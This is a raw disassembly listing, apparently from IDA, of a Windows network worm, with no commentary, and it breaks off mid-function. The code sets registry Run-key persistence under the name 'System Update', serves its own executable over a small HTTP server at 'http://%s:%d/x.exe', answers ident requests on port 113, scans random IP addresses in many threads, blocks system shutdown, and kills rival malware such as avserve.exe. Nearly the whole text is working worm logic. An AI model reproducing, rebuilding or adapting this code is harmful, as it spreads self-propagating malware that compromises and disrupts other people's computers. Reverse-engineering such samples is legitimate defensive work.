; Attributes: bp-based frame
sub_315019F3 proc near ; CODE XREF: sub_3150218B+3E�p
; sub_31502252+7�p
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_3150117C ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31501A14
call dword_31501180 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31501A14: ; CODE XREF: sub_315019F3+15�j
lea eax, [ebp+var_34]
push eax
call dword_31501188 ; gethostbyname
test eax, eax
jnz short loc_31501A29
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31501A29: ; CODE XREF: sub_315019F3+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_315019F3 endp
; =============== S U B R O U T I N E =======================================
sub_31501A32 proc near ; CODE XREF: sub_3150209F+22�p
; sub_31502103+27�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_3150115C ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31501A32 endp
; =============== S U B R O U T I N E =======================================
sub_31501A48 proc near ; CODE XREF: sub_31501D89+40�p
; sub_31501D89+4C�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push 2
call dword_315010DC ; OpenEventA
test eax, eax
jz short locret_31501A61
push eax
call dword_315010D8 ; SetEvent
locret_31501A61: ; CODE XREF: sub_31501A48+10�j
retn
sub_31501A48 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501A62 proc near ; DATA XREF: sub_31501B9B+127�o
var_200 = byte ptr -200h
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 200h
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
xor edi, edi
lea eax, [ebp+var_100]
push edi
push 100h
push eax
push ebx
call dword_315011A0 ; recv
cmp eax, 0FFFFFFFFh
jnz short loc_31501A93
push 1
jmp loc_31501B4E
; ---------------------------------------------------------------------------
loc_31501A93: ; CODE XREF: sub_31501A62+28�j
mov esi, dword_31501120
lea eax, [ebp+var_100]
push offset aGet ; "GET"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31501B51
lea eax, [ebp+var_100]
push offset a_exe ; ".exe"
push eax
call esi ; strstr
pop ecx
test eax, eax
pop ecx
jz loc_31501B51
mov esi, dword_3150119C
push 0
push 3Dh
push offset aHttp1_1200OkCo ; "HTTP/1.1 200 OK\r\nContent-Type: applicat"...
push ebx
call esi ; send
push ds:dword_31506150
lea eax, [ebp+var_200]
push offset aContentLengthU ; "Content-Length: %u\r\n\r\n"
push eax
call dword_3150113C ; wsprintfA
add esp, 0Ch
lea eax, [ebp+var_200]
push 0
push eax
call sub_31503A18 ; strlen
pop ecx
push eax
lea eax, [ebp+var_200]
push eax
push ebx
call esi ; send
loc_31501B10: ; CODE XREF: sub_31501A62+E8�j
mov eax, ds:dword_31506150
mov ecx, 1000h
sub eax, edi
cmp eax, ecx
jb short loc_31501B22
mov eax, ecx
loc_31501B22: ; CODE XREF: sub_31501A62+BC�j
test eax, eax
jz short loc_31501B6F
push 0
push eax
mov eax, ds:dword_31506148
add eax, edi
push eax
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz short loc_31501B4C
cmp eax, 1000h
jb short loc_31501B6F
push 64h
add edi, eax
call dword_315010A4 ; Sleep
jmp short loc_31501B10
; ---------------------------------------------------------------------------
loc_31501B4C: ; CODE XREF: sub_31501A62+D5�j
push 2
loc_31501B4E: ; CODE XREF: sub_31501A62+2C�j
pop eax
jmp short loc_31501B94
; ---------------------------------------------------------------------------
loc_31501B51: ; CODE XREF: sub_31501A62+49�j
; sub_31501A62+61�j
mov esi, dword_3150119C
push 0
push 15h
push offset aHttp1_1200Ok ; "HTTP/1.1 200 OK\r\n\r\n\r\n"
push ebx
call esi ; send
push 0
push 3
push offset dword_31505A84
push ebx
call esi ; send
loc_31501B6F: ; CODE XREF: sub_31501A62+C2�j
; sub_31501A62+DC�j
push 7D0h
call dword_315010A4 ; Sleep
push 2
push ebx
call dword_315011A4 ; shutdown
push ebx
call dword_315011A8 ; closesocket
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
loc_31501B94: ; CODE XREF: sub_31501A62+ED�j
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501A62 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501B9B proc near ; DATA XREF: sub_31501D89+133�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_315018BA
lea eax, [ebp+var_130]
push 104h
push eax
push offset aSystemUpdate ; "System Update"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov ds:dword_3150614C, ebx
call sub_315023BF
add esp, 14h
test eax, eax
jnz loc_31501CD0
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_315010EC ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31501C07
push 1
call dword_315010E0 ; ExitThread
loc_31501C07: ; CODE XREF: sub_31501B9B+62�j
push ebx
push esi
call dword_315010E8 ; GetFileSize
push eax
mov ds:dword_31506150, eax
call sub_315027DB
pop ecx
mov ds:dword_31506148, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push ds:dword_31506150
push eax
push esi
call dword_315010E4 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov ds:dword_31506150, eax
call dword_315010BC ; CloseHandle
push ebx
push 1
push 2
call dword_3150118C ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_31503A12 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31501C69: ; CODE XREF: sub_31501B9B+E5�j
; sub_31501B9B+ED�j ...
call dword_31501124 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov ds:dword_3150617C, eax
jz short loc_31501C69
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31501C69
push eax
call dword_31501194 ; htons
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31501170 ; bind
test eax, eax
jnz short loc_31501C69
push 64h
push edi
call dword_31501174 ; listen
mov [ebp+var_8], esi
pop esi
loc_31501CB2: ; CODE XREF: sub_31501B9B+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31501178 ; accept
push eax
push offset sub_31501A62
call sub_31501911
pop ecx
pop ecx
jmp short loc_31501CB2
; ---------------------------------------------------------------------------
loc_31501CD0: ; CODE XREF: sub_31501B9B+3D�j
push ebx
call dword_315010E0 ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31501B9B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501CDF proc near ; CODE XREF: sub_31501D89:loc_31501E91�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3150116C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31501CDF endp
; ---------------------------------------------------------------------------
loc_31501D0B: ; CODE XREF: UPX1:31508548�j
push 0
call dword_315010C4 ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov ds:dword_31506180, eax
call dword_31501098 ; DeleteFileA
call sub_315018BA
push offset aUterm13i ; "uterm13i"
call sub_315018E8
pop ecx
mov ds:dword_31506154, eax
call dword_3150109C ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31501D4D
push 1
call dword_315010F0 ; ExitProcess
loc_31501D4D: ; CODE XREF: UPX0:31501D43�j
call sub_31501727
call sub_31502523
call sub_3150269D
push offset sub_31501D89
call sub_315017AF
test eax, eax
pop ecx
jz short loc_31501D72
push 0
call sub_31501D89
loc_31501D72: ; CODE XREF: UPX0:31501D69�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31501D75 proc near ; CODE XREF: sub_31501D89:loc_31501EDF�p
; sub_3150209F:loc_315020B8�p ...
push 0
push ds:dword_31506158
call dword_31501094 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31501D75 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501D89 proc near ; CODE XREF: UPX0:31501D6D�p
; DATA XREF: UPX0:31501D5C�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_315011B0
push offset loc_31503A60
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
push ebx
push esi
push edi
push offset aU13ix ; "u13ix"
xor edi, edi
push edi
push 1
push edi
call dword_31501090 ; CreateEventA
mov ds:dword_31506158, eax
mov [ebp+var_4], edi
push offset aU10x ; "u10x"
call sub_31501A48
mov [esp+8+var_8], offset aU11x ; "u11x"
call sub_31501A48
mov [esp+8+var_8], offset aU12x ; "u12x"
call sub_31501A48
mov [esp+8+var_8], offset aU13x ; "u13x"
call sub_31501A48
mov [esp+8+var_8], offset aU8 ; "u8"
call sub_315018E8
mov [esp+8+var_8], offset aU9 ; "u9"
call sub_315018E8
mov [esp+8+var_8], offset aU10 ; "u10"
call sub_315018E8
mov [esp+8+var_8], offset aU11 ; "u11"
call sub_315018E8
mov [esp+8+var_8], offset aU12 ; "u12"
call sub_315018E8
mov [esp+8+var_8], offset aU13 ; "u13"
call sub_315018E8
mov [esp+8+var_8], offset aU13i ; "u13i"
call sub_315018E8
mov [esp+8+var_8], offset aU14 ; "u14"
call sub_315018E8
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31501E91
push offset aWs2_32 ; "ws2_32"
mov esi, dword_315010B4
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm13i ; "uterm13i"
call sub_315018E8
pop ecx
mov ds:dword_31506154, eax
loc_31501E91: ; CODE XREF: sub_31501D89+CD�j
call sub_31501CDF
push edi
push offset sub_31501F46
call sub_31501911
pop ecx
pop ecx
push 1F4h
mov esi, dword_315010A4
call esi ; Sleep
push edi
push offset loc_315033E3
call sub_315018F7
push edi
push offset sub_31501B9B
call sub_315018F7
push edi
push offset sub_31502BC3
call sub_315018F7
push edi
push offset loc_315022AE
call sub_315018F7
add esp, 20h
loc_31501EDF: ; CODE XREF: sub_31501D89+16D�j
call sub_31501D75
test eax, eax
jnz short loc_31501EF8
push edi
call dword_31501038 ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_31501EDF
; ---------------------------------------------------------------------------
loc_31501EF8: ; CODE XREF: sub_31501D89+15D�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31501D89 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_31501F15 proc near ; CODE XREF: sub_31501F46+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_31503A18 ; strlen
test eax, eax
pop ecx
jbe short loc_31501F43
loc_31501F28: ; CODE XREF: sub_31501F15+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31501F33
cmp al, 0Dh
jnz short loc_31501F37
loc_31501F33: ; CODE XREF: sub_31501F15+18�j
and byte ptr [esi+edi], 0
loc_31501F37: ; CODE XREF: sub_31501F15+1C�j
push edi
inc esi
call sub_31503A18 ; strlen
cmp esi, eax
pop ecx
jb short loc_31501F28
loc_31501F43: ; CODE XREF: sub_31501F15+11�j
pop edi
pop esi
retn
sub_31501F15 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31501F46 proc near ; DATA XREF: sub_31501D89+10E�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_315018BA
call dword_31501124 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31501932
lea eax, [ebp+var_48]
mov ebx, offset dword_3150615C
push eax
push ebx
call sub_31503A6C ; _mbscpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_3150118C ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31501168 ; htonl
push 71h
mov [ebp+var_14], eax
call dword_31501194 ; htons
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31501170 ; bind
test eax, eax
jz short loc_31501FD2
push 1
pop eax
loc_31501FCD: ; CODE XREF: sub_31501F46+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31501FD2: ; CODE XREF: sub_31501F46+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_31501174 ; listen
test eax, eax
jz short loc_31501FEA
push 1
pop eax
pop edi
pop esi
jmp short loc_31501FCD
; ---------------------------------------------------------------------------
loc_31501FEA: ; CODE XREF: sub_31501F46+9B�j
mov edi, dword_315010A4
loc_31501FF0: ; CODE XREF: sub_31501F46+C6�j
; sub_31501F46+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31501178 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_3150200E
push 64h
call edi ; Sleep
jmp short loc_31501FF0
; ---------------------------------------------------------------------------
loc_3150200E: ; CODE XREF: sub_31501F46+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_315011A0 ; recv
test eax, eax
jnz short loc_31502030
loc_31502027: ; CODE XREF: sub_31501F46+157�j
push esi
call dword_315011A8 ; closesocket
jmp short loc_31501FF0
; ---------------------------------------------------------------------------
loc_31502030: ; CODE XREF: sub_31501F46+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31501F15
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_31503A66 ; _mbscat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_31503A66 ; _mbscat
lea eax, [ebp+var_148]
push offset asc_31505B7C ; "\r\n"
push eax
call sub_31503A66 ; _mbscat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_31503A18 ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_3150119C ; send
push 1388h
call edi ; Sleep
jmp short loc_31502027
sub_31501F46 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150209F proc near ; DATA XREF: sub_31502103+55�o
; sub_3150218B+6A�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_315020AE
push 1
pop eax
jmp short locret_315020FF
; ---------------------------------------------------------------------------
loc_315020AE: ; CODE XREF: sub_3150209F+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
push esi
mov [ebp+var_1], al
xor bl, bl
loc_315020B8: ; CODE XREF: sub_3150209F+5A�j
call sub_31501D75
test eax, eax
jnz short loc_315020FB
call sub_31501A32
test eax, eax
jz short loc_315020FB
cmp [ebp+var_1], bl
jz short loc_315020F4
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_315011C0
movzx esi, ds:word_3150618C
pop ecx
call dword_31501124 ; rand
cdq
idiv esi
add edx, esi
push edx
call dword_315010A4 ; Sleep
loc_315020F4: ; CODE XREF: sub_3150209F+2E�j
inc bl
cmp bl, 0FFh
jb short loc_315020B8
loc_315020FB: ; CODE XREF: sub_3150209F+20�j
; sub_3150209F+29�j
pop esi
xor eax, eax
pop ebx
locret_315020FF: ; CODE XREF: sub_3150209F+D�j
leave
retn 4
sub_3150209F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502103 proc near ; DATA XREF: sub_3150218B+7E�o
; UPX0:31502340�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31502111
push 1
pop eax
jmp short loc_31502187
; ---------------------------------------------------------------------------
loc_31502111: ; CODE XREF: sub_31502103+7�j
push ebx
push esi
push edi
call sub_315018BA
mov esi, dword_31501124
xor ebx, ebx
loc_31502121: ; CODE XREF: sub_31502103+7D�j
call sub_31501D75
test eax, eax
jnz short loc_31502182
call sub_31501A32
test eax, eax
jz short loc_31502182
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31506184
mov byte ptr [ebp+arg_0+3], al
call dword_3150108C ; InterlockedIncrement
push [ebp+arg_0]
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502164
push [ebp+arg_0]
push offset sub_3150209F
call sub_31501911
pop ecx
pop ecx
loc_31502164: ; CODE XREF: sub_31502103+50�j
movzx edi, ds:word_3150618C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call dword_315010A4 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_31502121
loc_31502182: ; CODE XREF: sub_31502103+25�j
; sub_31502103+2E�j
pop edi
pop esi
xor eax, eax
pop ebx
loc_31502187: ; CODE XREF: sub_31502103+C�j
pop ebp
retn 4
sub_31502103 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150218B proc near ; DATA XREF: UPX0:31502358�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_315018BA
call sub_31501D75
test eax, eax
jnz loc_31502244
push ebx
mov ebx, dword_315010A4
push esi
mov esi, dword_31501124
push edi
loc_315021B1: ; CODE XREF: sub_3150218B+48�j
; sub_3150218B+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_315021C0: ; CODE XREF: sub_3150218B+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_315021C0
call sub_315019F3
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_315021B1
call sub_31501A32
test eax, eax
jz short loc_3150221C
push offset dword_31506184
call dword_3150108C ; InterlockedIncrement
push edi
call sub_315011C0
test eax, eax
pop ecx
jnz short loc_31502223
push edi
push offset sub_3150209F
call sub_31501911
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_31502208: ; CODE XREF: sub_3150218B+8D�j
push edi
push offset sub_31502103
call sub_31501911
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_31502208
jmp short loc_31502223
; ---------------------------------------------------------------------------
loc_3150221C: ; CODE XREF: sub_3150218B+51�j
push 2710h
call ebx ; Sleep
loc_31502223: ; CODE XREF: sub_3150218B+67�j
; sub_3150218B+8F�j
movzx edi, ds:word_3150618C
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31501D75
test eax, eax
jz loc_315021B1
pop edi
pop esi
pop ebx
loc_31502244: ; CODE XREF: sub_3150218B+11�j
push 0
call dword_315010E0 ; ExitThread
xor eax, eax
leave
retn 4
sub_3150218B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502252 proc near ; CODE XREF: UPX0:loc_31502319�p
; UPX0:loc_31502383�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_315019F3
push eax
call dword_31501190 ; inet_ntoa
mov esi, dword_31501088
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpy
push ds:dword_3150617C
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3150113C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_31505002
call esi ; lstrcpy
push offset byte_31505000
call dword_315010A0 ; lstrlen
mov byte_31505000[eax], 0DFh
pop esi
leave
retn
sub_31502252 endp
; ---------------------------------------------------------------------------
loc_315022AE: ; DATA XREF: sub_31501D89+149�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebp, ebp
push edi
mov ds:dword_31506184, ebp
call sub_31501A32
mov esi, dword_315010A4
mov edi, 1388h
test eax, eax
jnz short loc_315022DC
loc_315022D0: ; CODE XREF: UPX0:315022DA�j
push edi
call esi ; Sleep
call sub_31501A32
test eax, eax
jz short loc_315022D0
loc_315022DC: ; CODE XREF: UPX0:315022CE�j
lea eax, [esp+14h]
push ebp
push eax
call dword_3150115C ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov ds:dword_31506188, ebp
pop ebx
mov ds:word_3150618C, 96h
jz short loc_31502319
mov ds:dword_31506188, 1
mov ebx, 15Eh
mov ds:word_3150618C, 14h
loc_31502319: ; CODE XREF: UPX0:315022FF�j
call sub_31502252
mov ebp, [esp+14h]
cmp ebp, 100007Fh
jz short loc_31502337
push ebp
push offset sub_3150209F
call sub_31501911
pop ecx
pop ecx
loc_31502337: ; CODE XREF: UPX0:31502328�j
mov dword ptr [esp+10h], 4
loc_3150233F: ; CODE XREF: UPX0:31502350�j
push ebp
push offset sub_31502103
call sub_31501911
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_3150233F
test ebx, ebx
jle short loc_31502367
loc_31502356: ; CODE XREF: UPX0:31502365�j
push 0
push offset sub_3150218B
call sub_31501911
pop ecx
dec ebx
pop ecx
jnz short loc_31502356
loc_31502367: ; CODE XREF: UPX0:31502354�j
; UPX0:31502373�j ...
call sub_31501A32
test eax, eax
jz short loc_31502375
push edi
call esi ; Sleep
jmp short loc_31502367
; ---------------------------------------------------------------------------
loc_31502375: ; CODE XREF: UPX0:3150236E�j
; UPX0:31502381�j
call sub_31501A32
test eax, eax
jnz short loc_31502383
push edi
call esi ; Sleep
jmp short loc_31502375
; ---------------------------------------------------------------------------
loc_31502383: ; CODE XREF: UPX0:3150237C�j
call sub_31502252
jmp short loc_31502367
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150238A proc near ; CODE XREF: sub_31502523+8C�p
; sub_3150269D+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jnz short loc_315023BD
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501030 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
loc_315023BD: ; CODE XREF: sub_3150238A+1C�j
pop ebp
retn
sub_3150238A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_315023BF proc near ; CODE XREF: sub_31501B9B+33�p
; sub_31502523+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3150102C ; RegOpenKeyExA
test eax, eax
jz short loc_315023EB
push 1
pop eax
jmp short loc_31502415
; ---------------------------------------------------------------------------
loc_315023EB: ; CODE XREF: sub_315023BF+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31501028 ; RegQueryValueExA
test eax, eax
jz short loc_3150240A
push 2
pop esi
loc_3150240A: ; CODE XREF: sub_315023BF+46�j
push [ebp+arg_10]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_31502415: ; CODE XREF: sub_315023BF+2A�j
pop esi
leave
retn
sub_315023BF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502418 proc near ; CODE XREF: sub_315025D1+96�p
; sub_3150269D+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31501020 ; RegCreateKeyExA
test eax, eax
jz short loc_31502441
push 1
pop eax
jmp short loc_31502468
; ---------------------------------------------------------------------------
loc_31502441: ; CODE XREF: sub_31502418+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31501024 ; RegSetValueExA
test eax, eax
jz short loc_3150245D
push 2
pop esi
loc_3150245D: ; CODE XREF: sub_31502418+40�j
push [ebp+arg_4]
call dword_31501034 ; RegCloseKey
mov eax, esi
loc_31502468: ; CODE XREF: sub_31502418+27�j
pop esi
pop ebp
retn
sub_31502418 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3150246B proc near ; CODE XREF: sub_31502523+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_315010A0 ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_3150251F
loc_3150248B: ; CODE XREF: sub_3150246B+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31502494
dec esi
jns short loc_3150248B
loc_31502494: ; CODE XREF: sub_3150246B+24�j
push 0
push 2
call sub_31503A9C ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_3150251F
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31503A12 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31503A96 ; Process32First
test eax, eax
jz short loc_3150251F
lea esi, [esi+ebx+1]
loc_315024DC: ; CODE XREF: sub_3150246B+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31501120 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3150250C
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_315010C0 ; OpenProcess
push 0
push eax
call dword_31501080 ; TerminateProcess
loc_3150250C: ; CODE XREF: sub_3150246B+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31503A90 ; Process32Next
test eax, eax
jnz short loc_315024DC
loc_3150251F: ; CODE XREF: sub_3150246B+1A�j
; sub_3150246B+38�j ...
pop esi
pop ebx
leave
retn
sub_3150246B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31502523 proc near ; CODE XREF: UPX0:31501D52�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_3150258C: ; CODE XREF: sub_31502523+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_315023BF
add esp, 14h
test eax, eax
jnz short loc_315025C3
push ebx
push edi
push esi
call sub_3150238A
lea eax, [ebp+var_138]
push eax
call sub_3150246B
add esp, 10h
